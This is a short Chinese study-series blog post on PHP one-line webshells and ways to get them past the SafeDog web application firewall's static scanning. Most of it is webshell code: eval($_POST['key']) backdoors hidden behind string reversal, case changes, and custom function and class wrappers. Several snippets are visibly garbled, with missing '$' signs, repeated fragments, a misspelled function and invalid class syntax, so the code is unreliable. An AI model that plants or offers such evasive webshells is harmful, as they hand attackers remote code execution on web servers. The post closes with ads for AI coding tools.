Cyber Security-Day16(Webshell原理和Bypass安全狗)
一句话木马:
绕过WAT的操作
静态文本查杀
1.文本查杀绕过:大小转换、文本跌倒、文本分割、干扰函数、加密、语言特征...
<?php a=array("TrE","sSa");a=array("TrE","sSa");a=array("TrE","sSa");a=a[0].a[0].a[0].a[1];b=strtolower(b=strtolower(b=strtolower(a);pring_r(c=strrev(c=strrev(c=strrev(b));echo(var_dump(c(c(c(_POST['key'])));?>
自定义函数
<?php
function getkey($a){
@eval($a);}
getkey($_POST['key']);
?>
自定义类
<?php
class getkey($a){
public function getkeys($a){
@eval($a);
}}
$key = new getkey;
key → getkeys(_POST['key']);
?>
2.动态查杀
加密传输,改变传输特征:
本文作者:Arrest
本文链接:https://www.cnblogs.com/arrest/p/16479644.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步